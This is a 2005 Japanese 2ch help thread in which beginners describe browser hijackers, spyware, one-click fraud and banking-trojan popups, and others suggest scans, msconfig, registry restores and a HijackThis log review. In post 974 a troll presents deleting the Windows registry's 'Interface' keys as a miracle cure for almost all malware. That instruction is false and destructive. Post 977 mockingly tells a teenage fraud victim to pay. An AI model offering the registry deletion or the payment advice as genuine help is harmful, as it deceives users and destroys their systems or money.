|i!i |!┗┛┗┛i|!i|  / |   / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!   /,_ ┴─/ ヽ      |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||     (_゜.,》.'(_゜,》)ミ ヽ       ! | |!i||!|ii||!|ii|
i|ii        / ,,__,ニ、、 ノ( |           i|i!|i|
|i        | Y~~/~y} `, ~ |  そ、そんなー…   |i
!.          | ,k.,.,!,.,.,r| ,!  く                 .!
i        / <ニニニ'ノ    \               l

857 :840:05/03/01 03:27:56 ID:EJETwdUh
>>854レスありがとうございます。
   ほんとに朝までかかりそう。。。うぅ。。。
   ちなみに>>856は私ではないです。

858 :840:05/03/01 03:29:05 ID:EJETwdUh
ちなみに、タスクマネーシャーて、どうやって起動するんですか?

859 :840:05/03/01 03:33:30 ID:EJETwdUh
あと、WINのファイアウォール設定が有効になってなかったので
設定変更しようとしたんですが、「不明な問題のため」ってWクリックしても
起動できませんでした。これって…?

アリとキリギリスのお話は、私のような者への警告だったのですね。
まめにUPデートしようと誓いました。

教えてちゃんで申し訳ないです、よろしくご指導願います。

860 :ひよこ名無しさん:05/03/01 03:35:39 ID:???
どこで踏んだの?

861 :840:05/03/01 03:37:51 ID:EJETwdUh
>>860 2chの中です。
    Hなサイトとか行ってないですし。
   

862 :ひよこ名無しさん:05/03/01 03:39:32 ID:???
何を踏んだかわかれば解決も早いぞ

863 :840:05/03/01 03:43:40 ID:EJETwdUh
あぁ。。。
さっき別のスレで似たようなのみたんですが
(そこでは釣りとか言われてて相手にされてなかった。)
C:Owner¥Locas¥Temp¥Se,Dll,Install(ちょっと違うかも)
ってのが、WIN起動時に出てエラーが出ましたって警告がでます。
これも、同じ問題ですか?

864 :840:05/03/01 03:45:22 ID:EJETwdUh
>>862 それが、どこで何を踏んだか自覚がなくて…

865 :ひよこ名無しさん:05/03/01 03:48:00 ID:???
まず>>3のウイルススキャンしてくれ。

866 :840:05/03/01 04:02:34 ID:EJETwdUh
はい。
いまオンラインスキャン中です。
その前にトレンドマイクロの90日限定のウィルスバスターを入れて
それには、1つウィルスがひっかかってました。


867 :840:05/03/01 04:16:53 ID:EJETwdUh
どうも>>837さんと同様にHOMEの設定が戻るようになったんで
一応は解決と思いきや。。。
立ち上げ時の>>863の現象が残っていて不安が拭えない…
こんな時間になっちゃって、アドバイス求めるのもどうかと思うんですが
どなたか安心させてください。

868 :ひよこ名無しさん:05/03/01 04:24:28 ID:???
ファイル名を指定して実行>msconfig でスタートアップに同じ名前のがあったらチェック外して起動しないようにしてみれ

‥寝る

869 :ひよこ名無しさん:05/03/01 04:25:43 ID:JB8KP6bY
rundllが出てきて、se.dllの実行中にエラーが出ましたとか出るんです
スパイボットしても駆除出来ません


870 :840:05/03/01 04:29:52 ID:EJETwdUh
で、、出ました。。。
ウィルス1つ
TROJ_TOOLBARAってウィルスらしいです。
「駆除可能ーいいえ」となっているのは、駆除できないってことですよね。
どうしたらいいんでしょうかーーー??
あーーーーーん。

871 :840:05/03/01 04:36:05 ID:EJETwdUh
>>868ありがとうございました。
   おやすみなさい。。。

872 :840:05/03/01 04:44:11 ID:EJETwdUh
>>868ちなみに、スタートアップ内には同名のものは見あたらなかったです。
   うぅ。。

873 :840:05/03/01 04:55:32 ID:EJETwdUh
>>872を訂正。同名、ありましたです。
  

874 :ひよこ名無しさん:05/03/01 12:32:53 ID:???
>>873
テンプレ 7) のを両方落として起動、アップデートしておく > セーフモードで起動してサーチ。
再起動してウイルスチェックやりなおす。
あとでここも読んでかしこくなるように
http://www.higaitaisaku.com/removewz01.html

875 :ひよこ名無しさん:05/03/01 14:31:55 ID:x573yvbs
98です。

Orgasmをスーフモードで消したんですが、再起動したら
インターネットオプションのホームがかわってしまいます。
どうすればいいですか?

876 :ひよこ名無しさん:05/03/01 20:11:00 ID:???
>>875
OSがWindows98なら「レジストリの復元」という方法で、ほとんど解決できるよ。
やり方は、スタート→終了→MS-DOSモードで再起動(または、再起動して
F8キー連打→スタートアップメニューが表示されたら、
5:コマンドプロンプトオンリーを選択

scanreg /restoreと入力してリターンキー

問題の起こる前の最新の日付を選択(一番古い日付は×)

復元する。

しかもIDがvbsってこいつ・・・

877 :ひよこ名無しさん:05/03/01 22:04:56 ID:???
変なのを踏んでしまったらしく、メールをチェックしようとするたびに、
セキュリティーワーニングと書かれたポップアップが出てくるのですが、
どなたか、対処方法をお願いします。

878 :ひよこ名無しさん:05/03/01 22:08:32 ID:???
カタカナか

879 :ひよこ名無しさん:05/03/01 22:18:58 ID:???
セキュリティー〜は英語で書かれてます。
あと、メールアドレスを登録しろみたいなことも書かれてます。

880 :ひよこ名無しさん:05/03/01 22:27:17 ID:vhtetck2
質問です。
インターネットをしているといきなりウインドウが閉じられて海外のサイトに飛ばされてしまいます。
Ad-Aware、spybotを使いましたが解決できませんでした。
Panda Active Scan をつかってウイルスを駆除もしました。

881 :ひよこ名無しさん:05/03/01 22:45:50 ID:???
教えること何もないよ。テンプレ順番にやってちょ。

882 :名無しさん:05/03/01 22:49:28 ID:D2FcbItP
セキュリティソフト ノ−トン・バスタ−
を入れててもエロサイトに無力なの?
誰か偉い人教えて。過去お気に入り全て削除されエロにやられた経験あり

883 :ひよこ名無しさん:05/03/01 22:52:18 ID:???
>>882
マカフィーじゃないとダメ
シェアの多いのは未対応のものを置かれる

884 :ひよこ名無しさん:05/03/01 22:52:18 ID:???
>>882
Java script 、ActiveXがヒントだ。これ以上は胃炎。

885 :ひよこ名無しさん:05/03/01 22:53:16 ID:???
>>883
ソフトだけに頼ってるのはただの間抜けだぞ?

886 :名無しさん:05/03/01 23:02:19 ID:D2FcbItP
エロサイト対策ソフトがあれば良いのにね。
セキュリティソフトだけではまだまだ危険?



887 :ひよこ名無しさん:05/03/01 23:15:06 ID:???
>>885
おめえほど間抜けじゃねえぞ
それが証拠に何を踏んでも感染した事ねえもん

888 :ひよこ名無しさん:05/03/01 23:19:09 ID:???
>>887
たいしたモンだな。何でも踏めるのか?


889 :ひよこ名無しさん:05/03/01 23:28:08 ID:???
('A`) マカーには勝てねえ‥

890 :ひよこ名無しさん:05/03/01 23:30:59 ID:???
>>888
俺のセキュリティホールに対する知識は完璧
エロサイトよりも早いぞ
なんちゃない

891 :ひよこ名無しさん:05/03/01 23:34:59 ID:???
>>890
じゃあこれ踏んでみろ。俺にはとても罰当たり行為と思えて踏めねえ。。。

http://image.www.rakuten.co.jp/bif-shop/img1060405553.jpeg

892 :ひよこ名無しさん:05/03/01 23:36:15 ID:???
>>891
うっ 起動しねえよ

893 :ひよこ名無しさん:05/03/01 23:39:10 ID:???
>>891
それ最新パッチ効かないしな

894 :ひよこ名無しさん:05/03/01 23:41:03 ID:???
>>891
TROJ_GOLDENSHIT だな

895 :ひよこ名無しさん:05/03/02 00:04:31 ID:9DF7vuB0
誰か助けてください
OS win98
IE 6
ウイルスバスター2005

スパボット アドウェアーなどでスパイウェアーを駆除しきったところで
ネットに繋ぐと プラグインて出てきて勝手にホームの書き換え
不思議なアイコンの出現

の繰り返しなのです このプラグインソフトの削除はどうすればいい?


896 :ひよこ名無しさん:05/03/02 00:07:50 ID:???
>>895
エロサイトばかり見てるとそうなる。
少しは反省したらどうだ?

897 :ひよこ名無しさん:05/03/02 00:07:52 ID:???
>>895
アクティブXコントロールでインストールされた.dllファイルか.ocxファイル

898 :ひよこ名無しさん:05/03/02 00:18:58 ID:???
>>896
ちょっと反省しますた
>>897
ありがとう 


899 :895:05/03/02 00:36:07 ID:???
>>897
アクティブXでインストールされた物の見分け方ってあるのですか?
.dllで検索かけたら800ほど見つかったのですが

900 :ひよこ名無しさん:05/03/02 00:47:43 ID:???
独りで寂しくテンプレに励め。その中からおまえの意志で知識を得るのだ。

901 :ひよこ名無しさん:05/03/02 01:19:26 ID:???
>>899
C:\WINDOWS\Downloaded Program Files
ここのファイルをプロパティを表示して依存関係を見るんだ
そして、regsvr32 /u c:\〜〜.dll または .ocx
このコマンドでアンインストールするんだ
このファイルがシステムでどんな立場にあるかがわかったら、
もう卒業だ!

902 :895:05/03/02 01:38:12 ID:???
>>901
さっそくC:\WINDOWS\Downloaded Program Files をみましたが
regsvr32 /u c:\〜〜.dll または .ocx  はなかったです
ショックウェーブとウイルスオンラインスキャンのやつだけでした

卒業はまだまだ先のようです



903 :ぼるじょあ ◆yBEncckFOU :05/03/02 01:43:42 ID:???
(・3・) エェー

904 :ひよこ名無しさん:05/03/02 01:46:26 ID:???
baka

905 :ひよこ名無しさん:05/03/02 01:47:52 ID:???
ID:???の質問は受け付けません

906 :ひよこ名無しさん:05/03/02 01:50:40 ID:???
唇の針傷が痛むぜ‥

907 :ひよこ名無しさん:05/03/02 02:00:02 ID:???
>>906
クマッ━(ry ?

908 :ひよこ名無しさん:05/03/02 10:29:29 ID:???
PCオカシクなったので質問しようかと思ったけど
ここのテンプレの通りにやったら回復した!感謝感激

909 :OSはXP:05/03/02 11:05:11 ID:???
今ギコナビから書いているのですが、
IEブラウザが開けなくなり、ホームページがhttp://213.159.117.134/index.php
に固定されてて、変なブラウザが勝手にインストールされました・・・
その変なブラウザは何故かプログラムの追加と削除に載ってないし・・・
その変なブラウザ画面にUninstallボタンがあったのでクリックすると、
"0x74633b060"の命令が"0x74633b60"のメモリを参照しました。メモリが"read"になることはできませんでした。
・・・と表示されるだけでアンインストールできません。

それと数分ごとに
このウィンドウはビジーです。
このウィンドウを閉じると、問題が発生する可能性があります。

ウィンドウを閉じますか?

・・・と出るようになりました。テンプレは一通り試したけど何回やってもホームページが↑のURLのままだし・・・
一体どうすればいいでしょうか。



910 :ひよこ名無しさん:05/03/02 11:20:04 ID:???
>>909
▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別)
 ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。
 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別)
 ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類)
 ・ まず、テンプレの>>2-10あたりを必ず読む。


911 :ひよこ名無しさん:05/03/02 12:16:41 ID:???
>>909
>>837あたりから嫁

912 :ひよこ名無しさん:05/03/02 12:26:36 ID:???
ダークロリータばっかだな
俺も一度踏んだけどシステムの復元で問題無

913 :ひよこ名無しさん:05/03/02 14:01:44 ID:ty5l7qul
http://love-machines.com/contract/?id=7

でIPとリモートホストをとられたとかいわれた。
ヤバイ?

914 :ひよこ名無しさん:05/03/02 14:28:04 ID:???
生卵食ったら喉に詰まるぐらいの確率でヤバい

915 :ひよこ名無しさん:05/03/02 14:53:33 ID:???
坦々麺食っている時に、くしゃみが出そうになるくらいヤバイ

916 :ひよこ名無しさん:05/03/02 15:18:43 ID:odgC8P1D
要するに全くヤバくないということかw

ワンクリ詐欺食らったのが初めてだからけっこう焦ったが
今考えればIPとリモートだけで何をする気なのかわからん。
メアドも出てないとは。

あれだな。最初にQ2トラップ踏んだときみたいな衝撃だった。
914と915のおかげで安心した。サンクス。

917 :909:05/03/02 15:34:57 ID:z06V+3FE
初歩的な質問ですいません、IE窓を出そうとすると
問題が発生したため、IEXPLORE.EXE を終了します。 ご不便をおかけして申し訳ありません。
・・・と出て>>838見れません。
どうすればいいですか?

918 :ひよこ名無しさん:05/03/02 15:55:52 ID:???
ログ解析難しいな

919 :ひよこ名無しさん:05/03/02 16:21:29 ID:???
>>917
エラーの詳細に****.dllみたいなファイル名が書かれていないかな?
それが悪さをしていることになるからまずそれを書いて。


920 :ひよこ名無しさん:05/03/02 16:41:46 ID:HcqYNRgi
PC初心者板から誘導されました

ADSLなら繋がらないと聞いたんですが、ネットに接続すると
国際電話に接続しました。と表示がでます
ウイルスに感染したらしいんです
どうすればいいでしょうか?

921 :ひよこ名無しさん:05/03/02 16:47:16 ID:AePM0TJw
私も、おとといぐらいから
なぜかネットしていたらエロサイトやカジノ系の大きな広告が出てきたりします。
初心者なんでよくわからないです・・・・
右下のタスクバーの時計付近に
英語の吹き出し(英語と漂白?って漢字が書いてあったような)が出たりします。
英語の文字が出てきて「YES」か「NO」かとたずねられます・・
ウィルスかと思いきやスキャンに引っかからないし
2ちゃんみてても開いてきます  ウザイ
私エロサイトと見ないし・・・・(・A・)
どうしたらよいでしょうか?教えてください!

922 :ひよこ名無しさん:05/03/02 16:58:46 ID:???
>>921
http://ejrs.com/spybot/spybotsd13.exe
↑これをクリックするとspybotというソフトがダウンロードされます。
これでスパイウェアをデストロイしてみてください。

923 :ひよこ名無しさん:05/03/02 17:02:47 ID:???
>>920
「国際電話 被害 ADSL」でGoogle検索すれば?
>>921
テンプレ見ながら対処するしかないよ。
ある程度のことをやってから具体的な質問をしよう。

924 :909:05/03/02 17:08:20 ID:z06V+3FE
エラー報告に含まれるデータの参照 を見ましたがありませんでした・・・
一体どうすれば・・・・


925 :ひよこ名無しさん:05/03/02 17:12:12 ID:825CeOV4
今いろいろいじっています・・・
こんなアイコンあったっけ?といろいろ悩んでいます

お気に入りが増えていると思いきや外国のアダルトサイトばっかり。
しかもさっき消したヤツと同じ並び
こんなんして楽しいんかい?!  はぁ・・・・・・・・・

926 :ひよこ名無しさん:05/03/02 17:14:55 ID:???
>>925
なに?

927 :ひよこ名無しさん:05/03/02 17:25:45 ID:???
>>922梅さんを知っている人ってこんな板にもいるんだね…世界って狭い。

928 :ひよこ名無しさん:05/03/02 17:26:30 ID:???
>>924
とりあえずIEではないブラウザをインストールしてサイトを閲覧しましょう。
右クリックから保存はできるでしょ?ダウンロードできたらダブルクリックをしてインストール。
Opera
http://www.ring.gr.jp/archives/net/www/opera/win/754u2/ja/std/ow32jaja754u2.exe

929 :ひよこ名無しさん:05/03/02 17:30:42 ID:825CeOV4
291ですけど、バッチファイルってなんですか?
あと「テキストベース(コマンドライン)の機能を実行できます」
っていうのがいっぱいある(COPYLNK・・・?など)
FMCって書かれたアイコンのアプリケーションも沢山ある・・・・
もう訳わかんない・・・・・・・・氏

930 :ひよこ名無しさん:05/03/02 17:32:33 ID:vbtrAlXC
>>922
>921と同じ症状でしてダウンロードしたのですが
英語で書いてあるので何をしたらいいかわかりません。
教えてください。

931 :ひよこ名無しさん:05/03/02 17:33:17 ID:???
>>291

932 :ひよこ名無しさん:05/03/02 17:34:37 ID:???
馬鹿!なんでもかんでも人に聞くなよ。

933 :ひよこ名無しさん:05/03/02 17:41:35 ID:???
>>930
まず、ソフトを起動させて、Lキーを押しましょう。いろいろな国の国旗が
出てきましたね?その中から日本の国旗をクリックしてください。

934 :ひよこ名無しさん:05/03/02 17:59:48 ID:???
>>921
これ、「ms4hd」と言われているスパイウェアですよ。
完全に消すには、「回復コンソール」

935 :ひよこ名無しさん:05/03/02 18:34:34 ID:WCPz/taq
助けて下さい。お願いします。
デスクトップの壁紙を↓のように変更しようと思って、
WARNING!
YOU'RE IN DANGER!

Smart-Security=213.159.117.130に飛んでも、ページが見つからないと出ます。
せっかく素敵な壁紙に変更しようとしたのに、これはどういうつもりですか。
どうしてサイトを削除するのですか?

936 :ひよこ名無しさん:05/03/02 18:42:38 ID:???
>>935
これか?
ttp://dynabook.com/assistpc/faq/pcdata/002903.htm

937 :935:05/03/02 19:12:12 ID:WCPz/taq
>>936
情報提供してくれたのには感謝しますが、
決してこの壁紙を削除したいわけではありません。
むしろ逆にこの壁紙を入れたいのです。

938 :ひよこ名無しさん:05/03/02 19:23:39 ID:umRJh0xe
画像を保存する時に拡大表示にする以外に「携帯のマーク+彩」というボタンが出るようになってしまいました。
ボタンを押すと、天下彩信http://mms.t2t2.com/to_send.asp?imgurl=画像URLといった所に飛ばされるます。
プログラムの削除のところにも何もなく、CWShredderやAd-Awareでフルスキャンしても何も出てきませんでした。
自分の知識では直りそうにないので知識を貸して貰えないでしょうか。
Windows XPSP1とIE6を使っています。


939 :ひよこ名無しさん:05/03/02 19:24:37 ID:???
荒らすな童貞

940 :ひよこ名無しさん:05/03/02 19:31:03 ID:???
禁断のテンプレを改良した。
このスレでは、ちゃんと注意書きまで記したのに
一文字も読まずに実行しちゃうアホがいて困ったもんだわ。

次スレまであと3日以内ってところだな。

941 :ひよこ名無しさん:05/03/02 19:39:28 ID:???
やはりこいつかw

942 :ひよこ名無しさん:05/03/02 19:45:24 ID:???
もしかして、>941?
お前、注意書き読まずに実行したのか。
でも安心して下され、おじいさん。
禁断のテンプレを実行したおかげで、OS再インスコ
して直ったんだから。

943 :ひよこ名無しさん:05/03/02 19:54:09 ID:???
安心して下され、おじいさん

944 :ひよこ名無しさん:05/03/02 21:22:16 ID:???
こいつ普通じゃねぇな・・

945 :ひよこ名無しさん:05/03/02 21:45:39 ID:???
ms4hdテラウザス 俺もかかった臭いな
手動で消すかな

946 :ひよこ名無しさん:05/03/02 22:09:21 ID:???
直りましたよっと

947 :ひよこ名無しさん:05/03/02 22:18:48 ID:???
ms4hdを完全に消去するには、イカれたハッカーですら1時間以上かかる。
俺なら、1時間と02分18秒かかるけどな。

948 :ひよこ名無しさん:05/03/02 22:22:17 ID:???
20分で消えたぞ?

949 :ひよこ名無しさん:05/03/02 23:55:48 ID:jOssmbw9
さっき突然エロサイトに飛んでしまい、慌てて変な所をクリックしたら
会員登録されましたと出たんですが・・・
これって流行のワンクリック詐欺ですか?完全無視で良いですか?


950 :ひよこ名無しさん:05/03/02 23:58:26 ID:???
i|!| |i┏┓! i!┏┳┓| |||i|!i| ||!i|| |||ii| ||| ||| |i||!|i│i!┏┓i!|
|i|┏┛┗━╋┻┛|i!||!|ii|| i|!i||i|┏━┓ ┏┓i|i| i┃┃i!|
i||┗┓┏┓┃||i┏━━━━┓┗━┛ ┃┃|i||!i┃┃i!|
|i |!|i┃┃┃┃i||┗━━━━┛|i|| || ||||!┃┃i|i| i┗┛!i|
i||i ||┃┃┃┃|! |||i ||i    !|||!|┏━━┛┃|i||!i┏┓i|!
|i!i |!┗┛┗┛i|!i|  / |   / | ┗━━━┛i|i| i┗┛i!|
i| |||i|!i| ||!|i||i!   /,_ ┴─/ ヽ      |!i| ||| |i||!|i|i|||| ||i
|i|| ||i!i||     (_゜.,》.'(_゜,》)ミ ヽ       ! | |!i||!|ii||!|ii|
i|ii        / ,,__,ニ、、 ノ( |           i|i!|i|
|i        | Y~~/~y} `, ~ |  そ、そんなー…   |i
!.          | ,k.,.,!,.,.,r| ,!  く                 .!
i        / <ニニニ'ノ    \               l

951 :ひよこ名無しさん:05/03/03 00:19:50 ID:mnGoIWD4
age

952 :909:05/03/03 00:38:51 ID:MIb2W3jv
>>回答者 Thx!!
こういう問題が起こったのは自分にとって良い事だったのかもしれない

953 :ひよこ名無しさん:05/03/03 00:50:03 ID:TWIlnGW7
channelboxの画箱のアイドルのとこ拡大してみたんですが
有料なんですか?業者が貼り付けてるとか?あとスパイウェア
チェックしたほうがいいですか?教えてください。
じゃないと兄のカミナリが落ちるんで・・・

954 :ぼるじょあ ◆yBEncckFOU :05/03/03 01:01:11 ID:???
>>953
(・3・) エェー カートンコムに詳しくのってますYO
http://the-cartoon.com

955 :ひよこ名無しさん:05/03/03 01:11:35 ID:TWIlnGW7
>>954
見たのはそんなのじゃないんです、ハイ

956 :ひよこ名無しさん:05/03/03 02:18:15 ID:???
>>955
場所が分からなければ有料か判断できないですね。

957 :ひよこ名無しさん:05/03/03 02:28:54 ID:???
ホームページ内のボタンをクリックしようとすると、
Dear internet bank user!
と始まるポップアップが出て、
そのポップアップを閉じることも、ほかのインターネットブラウザを閉じることも出来ないという、
動作が不能になる様になりました。

spybotも、ad-awareも試したのですが、直りません。

この症状の治し方を知ってる人いませんか?


958 :ひよこ名無しさん:05/03/03 02:45:01 ID:???
>>957
ヒント少なすぎ。携帯かOpera使え。

959 :ひよこ名無しさん:05/03/03 02:47:18 ID:???
これかねえ‥?
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_BANKER.W
ま、とりあえずウイルスチェックしてくだちい。
Opera導入はおれも一票。 火狐でもええけど

960 :ひよこ名無しさん:05/03/03 04:06:22 ID:???
spybotでCoolWWWSearch.Leftoversという問題箇所が見つかるのですが、消えてくれません。
CWShredderのV2.13を使っても問題箇所が無いと出るので無理です。
どうすれば治せるでしょうか?

961 :960:05/03/03 04:23:37 ID:???
書き忘れましたが症状はネットを見ているとポップアップが出てくるといったものです。

962 :ひよこ名無しさん:05/03/03 04:36:01 ID:???
>>960
セーフモードは?

963 :960:05/03/03 08:26:43 ID:???
>>962
セーフモードとはどうやるのですか?

964 :ひよこ名無しさん:05/03/03 08:32:44 ID:???
>>963
そらきた ネタ質

965 :ひよこ名無しさん:05/03/03 10:35:25 ID:???
セキュリティを最高にしていたら、強制インストールだけ防げるのか。

966 :ひよこ名無しさん:05/03/03 13:11:52 ID:???
>>965
正確に言うと、Javaスクリプト、Javaアプレット、VBSスクリプト
そもそも、これらがブラウザ側で命令を受け付けないから、
その中に何を埋め込んでも無駄なので何もされない。
ついでに、画像の表示も無効に設定すると最強。
ははは バカしかやらない。

967 :ひよこ名無しさん:05/03/03 13:32:29 ID:Y+S0gqji
921です
ソフトダウンロードしてスキャンしましたがありませんでした。
1度設定しなおして、消えたのにまだabout:blankのままです。
お気に入りは荒れるし、トップページは真っ白やら検索のテキストボックスあるページに行くやら・・
真っ白のabout:blankは設定しなおせば直るらしいのですが・・・・・1度直ってもまたなります
ガイシュツで申し訳ないです

968 :ひよこ名無しさん:05/03/03 13:34:17 ID:Y+S0gqji
921↑間違い
about:blank以外にもかかっていると思ってスキャンしたのですが
だめでした Orz

969 :ひよこ名無しさん:05/03/03 14:04:33 ID:aIj3UZk5
チャットで裏入室ってどうやるんですか?

970 :ひよこ名無しさん:05/03/03 14:08:54 ID:???
さっちん萌え萌え

971 :ひよこ名無しさん:05/03/03 15:47:03 ID:mp/e54sT
超初心者の質問に答えるスレから誘導されました。
エロサイト徘徊中に怪しげなサイトに入ってしまいました。
それからホーム設定をいくらしてもabout:blankというサイトにいってしまいます。
どうしたら正常に戻るのか対処法を教えてください。
それとネット接続中にreal money and bonuses というカジノのようなサイトにも接続されます。
言葉足らずで申し訳ありませんがお願いします。


972 :971:05/03/03 15:53:14 ID:???
>>921
私と同じ症状です

973 :ひよこ名無しさん:05/03/03 16:27:48 ID:???
>>971
スレのどこみてんの?

974 :ひよこ名無しさん:05/03/03 19:15:22 ID:???
神・パソコンのトラブル解消法(WindowsME/WindowsXPはシステムの復元をOFFに設定)

PCをセーフモードで起動します

「スタート」メニューを開いて、ファイルを指名して実行をクリック

regeditと入力してOKをクリック→レジストリエディタが開く

以下のキーを削除
HKEY_CLASSES_ROOT\Interface
HKEY_LOCAL_MACHINE\Software\CLASSES\Interface

作業終了→PCを通常モードで再起動

問題解決!!

効果:ウィルス=(ファイル感染型・ファイル破壊型・メモリ常駐型・ブートセクタ感染型・
HDD破壊型・BIOS破壊型など)ほぼ全部。
トロイ=(バックドア作成型・パスワード詐取型・不正プログラムインストール型など)ほぼ全部。
ワーム=(メール大量送信型など)ほぼ全部。
スパイウェア=(coolwebsearch系・HSA系・CnsMin・Ms4Hdなど)ほぼ全部。
に効果がある、まだ誰も発見していない素晴らしい駆除方法です。

975 :ひよこ名無しさん:05/03/03 20:32:59 ID:???
wkmst.exe と DllHandler.exe は危険だった。
あ〜しんど。

976 :変態ですみません(15歳):05/03/04 00:26:00 ID:iHgz21tQ
かなりのパソコン初心者なんですけど、こんな時どうすればいいんですか?着メロ無料の掲示板で、
無料で着メロを取ろうとしたら、その掲示板に書いてあったサイトをクリックして入ったら変なエロサイトだったんです。
興味があったので、少し見てたらいきなり登録完了いたしましたって出てきてしまいました。あなたのパソコンのULRだっけ?
をなんとかって来たんですけど、これで電話とか手紙が家に送られて来るなんてことあるんですか?
親にばれたらどうしよう、おねがいですアドバイスください。

977 :ひよこ名無しさん:05/03/04 00:30:18 ID:???
>>976
今すぐに、お金を振り込みなさい。

978 :ひよこ名無しさん:05/03/04 00:42:56 ID:???
>>976
お前、その前に日本語へんだぞ
その日本語治したら相談に乗ってやる

979 :ひよこ名無しさん:05/03/04 01:54:19 ID:Th39F5yx
助けてください
osはwindows98
ブラウザは5,01

アダルトサイトを開いたら様子が変なのですぐに閉じたけど
検索のスペースとホームが英語のサイトになっていました。
SpybotやAd-AwareやHijyack thisをしてみましたが
検出した消してもすぐに消したものがでてきます。

Spybotでは「Allcyber search」というのがずっと出ています。
>>5にあったページで調べたら
O4 - HKLM\..\Run: [sp] rundll32 C:\WINDOWS\TEMP\SE.DLL,DllInstall
というのが赤でした。これも消してもまた出てきます。
どうすればよいでしょうか、教えてください。

980 :979:05/03/04 01:57:41 ID:Th39F5yx
hijack thisの結果です

C:\WINDOWS\SYSTEM\KERNEL32.DLL
C:\WINDOWS\SYSTEM\MSGSRV32.EXE
C:\WINDOWS\SYSTEM\SPOOL32.EXE
C:\WINDOWS\SYSTEM\MPREXE.EXE
C:\WINDOWS\SYSTEM\MDM.EXE
C:\WINDOWS\SYSTEM\HIDSERV.EXE
C:\WINDOWS\SYSTEM\mmtask.tsk
C:\WINDOWS\EXPLORER.EXE
C:\WINDOWS\SYSTEM\SYSTRAY.EXE
C:\WINDOWS\TASKMON.EXE
C:\WINDOWS\SYSTEM\NMFTASK.EXE
C:\PROGRAM FILES\NECMFK\NECMFK.EXE
C:\WINDOWS\SYSTEM\IMEJPMGR.EXE
C:\PROGRAM FILES\CYBERTRIO\SHOWMODE.EXE
C:\WINDOWS\SYSTEM\STIMON.EXE
C:\WINDOWS\SYSTEM\QTTASK.EXE
C:\WINDOWS\SYSTEM\INTERNAT.EXE
C:\WINDOWS\RUNDLL32.EXE
C:\WINDOWS\RunDLL.exe
C:\PCP\PCPORTAL.EXE
C:\NECAMENU\NACTMENU.EXE
C:\FAXNX\CASCTRL.EXE
C:\WINDOWS\SYSTEM\WMIEXE.EXE
C:\PROGRAM FILES\NTTW\FLETS\APP\ENTERNET.EXE
C:\WINDOWS\SYSTEM\DDHELP.EXE
C:\PROGRAM FILES\INTERNET EXPLORER\IEXPLORE.EXE
C:\PROGRAM FILES\LAVASOFT\AD-AWARE 6\AD-AWARE.EXE
C:\WINDOWS\デスクトップ\HIJACKTHIS\HIJACKTHIS.EXE

981 :979:05/03/04 02:00:04 ID:Th39F5yx
O2 - BHO: (no name) - {E6FBECA1-8C37-11D9-ACAE-00409A347873} - C:\WINDOWS\SYSTEM\BBHC.DLL
O3 - Toolbar: ????? - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\SYSTEM\MSDXM.OCX
O4 - HKLM\..\Run: [SystemTray] SysTray.Exe
O4 - HKLM\..\Run: [ScanRegistry] c:\windows\scanregw.exe /autorun
O4 - HKLM\..\Run: [TaskMonitor] c:\windows\taskmon.exe
O4 - HKLM\..\Run: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\Run: [Hidserv] Hidserv.exe run
O4 - HKLM\..\Run: [NMFTASK] NMFTASK.EXE /RESET
O4 - HKLM\..\Run: [NECMFK] C:\PROGRA~1\necmfk\necmfk.exe
O4 - HKLM\..\Run: [CyberTrioModeInfo] C:\Program Files\CyberTrio\ShowMode.exe
O4 - HKLM\..\Run: [StillImageMonitor] C:\WINDOWS\SYSTEM\STIMON.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\WINDOWS\SYSTEM\QTTASK.EXE" -atboottime
O4 - HKLM\..\Run: [internat.exe] internat.exe
O4 - HKLM\..\Run: [sp] rundll32 C:\WINDOWS\TEMP\SE.DLL,DllInstall
O4 - HKLM\..\RunServices: [Hidserv] Hidserv.exe run
O4 - HKLM\..\RunServices: [LoadPowerProfile] Rundll32.exe powrprof.dll,LoadCurrentPwrScheme
O4 - HKLM\..\RunServices: [SAService] C:\Program Files\CyberTrio\SaService.exe
O4 - HKLM\..\RunServices: [Machine Debug Manager] C:\WINDOWS\SYSTEM\MDM.EXE
O4 - HKCU\..\Run: [Taskbar Display Controls] RunDLL deskcp16.dll,QUICKRES_RUNDLLENTRY

982 :979:05/03/04 02:01:25 ID:Th39F5yx
O4 - Startup: PCポータル.lnk = C:\PCP\PCPORTAL.exe
O4 - Startup: アクティブメニューNX.lnk = C:\NECAMENU\NActMenu.exe
O4 - Startup: FAX-NX Controller.lnk = C:\FAXNX\98TELFAX.EXE
O4 - Startup: Windows Update のインストールの再開.lnk = C:\WINDOWS\Windows Update Setup Files\ie6setup.exe
O4 - Startup: EPSONプリンタウインドウ!3 環境設定(2).lnk = C:\WINDOWS\SYSTEM\E_SRCV02.EXE
O14 - IERESET.INF: START_PAGE_URL=http://www.nec.co.jp/98/
O14 - IERESET.INF: MS_START_PAGE_URL=http://www.jp.msn.com
O16 - DPF: {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B} (QuickTime Object) - http://www.apple.com/qtactivex/qtplugin.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
O16 - DPF: {74D05D43-3236-11D4-BDCD-00C04F9A3B61} (ウイルスバスター On-Line Scan) - http://a840.g.akamai.net/7/840/537/2004061001/housecall.trendmicro.com/housecall/xscan53.cab
O16 - DPF: {2A32B14F-4D29-4EA3-AC54-E9B19F436CE7} (Scanner Class) - http://www.windowsecurity.com/trojanscan/TDECntrl.CAB
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoftware.com/activescan/as5/asinst.cab

983 :ひよこ名無しさん:05/03/04 02:06:16 ID:CCIa+Dav
2?O´?(C)?I´?A
